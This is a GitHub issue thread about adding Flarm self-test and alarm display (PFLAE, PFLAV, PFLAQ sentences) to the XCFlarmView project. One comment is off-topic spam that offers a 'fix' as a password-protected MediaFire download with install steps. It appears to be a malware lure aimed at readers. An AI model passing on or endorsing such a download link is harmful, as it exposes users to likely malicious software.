### ISSUE TITLE
New options - ideas for development

### ISSUE THREAD

**Issue by Martin-Kriz** [iltis42/XCFlarmView#6]
Hi,
I have ideas for further development. XCFlarmView looks very good.
It would also be very good if the display would show status information that is displayed during start, restart, upg firmware, error ... Flarms, similar to what is done on the circular LED display Flarms. Since the Flarm itself is mostly hidden behind the dashboard, it would be very useful if this information was displayed when the Flarm is started.
If it could be included in one of the next releases, it would be really perfect.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by iltis42** [comment]
Circular Flarms display stati for Power, GPS, Send (TX) and Receive (RX) with a green LED. 
Instead of continous green LED's shining 24/7, XCFlarmView implements bad things as alarms "NO GPS", "NO TX", that are displayed in fat red color on screen when applicable. After a restart of the Flarm, until Flarm is newly syncronized those are of course visible until GPS is synched and TX can take place. No RX is no alarm, its simply no traffic, visualized with nothing printed beside the own airplane Icon. 
Note that those issue may happen at any time, not only at startup, so just display something at startup wouldn't be complete. So what is done on circular Flarm display's in terms of errors should be covered here. What else is already planned is a serial monitor what can show the text on serial interface at Flarm startup, this is ASCII text and not standardized but contains all relevant info from Flarm selftest, its here the second point: https://github.com/iltis42/XCFlarmView/issues/3

**Comment by Martin-Kriz** [comment]
Hi,
thanks for the reply. I understand that the status LEDs are replaced by "NO GPS", "NO TX" signals. That's good.
If the adjustments count the display of the status of the auto test, which are displayed on the circular LED display during the start of Flarm (or on the Flarm display), then that is exactly what I had in mind.

Status information (during self-test - flame start)
- Ver. HW
- Ver SW
- Fault finding
- Other indication
        Copying the IGC-file onto the SD-card
        Running Flash firmware update from SD-card
        Copying the obstacle database from SD-card
- ...

see Flarm and LXnav Flarm LED indicator manuals:
https://www.flarm.com/wp-content/uploads/2024/04/FLARM_OperatingManual_Legacy_v5.00_EN.pdf
https://gliding.lxnav.com/wp-content/uploads/manuals/FlarmLedManualEnglishVer0114rev7.pdf

**Comment by iltis42** [comment]
Instead of some cryptic LED code (i have asked 6 LED Flarm users who knows what exactly that means hence got no correct response so far :): 
![image](https://github.com/user-attachments/assets/0e79a068-3a8e-4f81-8817-17576cb725a0)

the idea is to show transparently the serial output of Flarm, maybe from Selftest start:

![image](https://github.com/user-attachments/assets/7f07ef1c-88ac-47d3-8ef1-edb4bc31060c)

e.g. until the first PFLAU arrives (the Flarm heartbeat, status, and basic alarms).
![image](https://github.com/user-attachments/assets/dbe70446-3f9f-4148-bfbf-1321f78db430)

The selftest is human readable and major error's would be appearing there in cleartext already, e.g. as shown in the pictures avove here the error with Obstacle database (feature missing) is explicit printend.
Beside that, the errorcode in the PFLAE,A,2,B1 shows the "B1" in ASCII, and not encoded in a cryptic LED pattern, 
B1 = Invalid obstacle database license.
Same for the SW Version printed as SW 7.22/1.23, very clear and obvious without any need of binary LED codes decoding ;)



B1 = Invalid obstacle database license (e.g. wrong
serial number)

**Comment by Martin-Kriz** [comment]
Hi,
it seems that transparently displaying the serial output of the Flarm, from the beginning of the Selftest, carries similar information as the circular LED display. Even at first glance in a more readable form than on a circular LED display.
If this information of the Flarm serial output of the entire self-test, including the B1 code, ... will be displayed on XCFlarmView, then that is exactly it.
I wanted to somehow interpret this information for the user, it was coded in a combination of LEDs on the circular LED display. The form of displaying the serial output of the entire Flarm selftest on XCFlarmView will be more readable and user-friendly.
Thanks M

**Comment by iltis42** [comment]
As one thing the "spontaneous alarms" won't work when just transparently showing the serial output at start, the better option indeed is to implement the PFLAE sentence as specified in Flarm data port specification to cover this.
The new code is already implemnting any of that known alarms here:  https://github.com/iltis42/XCFlarmView/blob/f5ac3c67df841b2ab543bb204dc429a25aca51d5/main/Flarm.cpp#L42
and e.g. will display's those alarm at any time when active on the display in various colors, e.g. light blue for info, yellow for warning and red for errors. 
![image](https://github.com/user-attachments/assets/d7df5c94-ecd4-4927-849e-3855846e3d1e)

Also SW Version that sent in PFLAV dataset, as well as progress information like IGC download or firmware update is avail via standardized PFLAQ, that won't be part of startup but may be originated while running needs to be implemented as next step.

**Comment by Martin-Kriz** [comment]
Hi,
it's true that "spontaneous alarms" won't work if you just transparently display the serial output at startup, surely a better option is to actually implement the PFLAE statement as specified in the Flarm data port spec.
If in the next step the evaluation of the PFLAV dataset is implemented in SW, as well as progress information such as IGC downloads or firmware updates, through a standardized PFLAQ that will not be part of the startup but can be created at runtime, then it will be very good.

The implementations of some of the known alarms in the new code also look good.
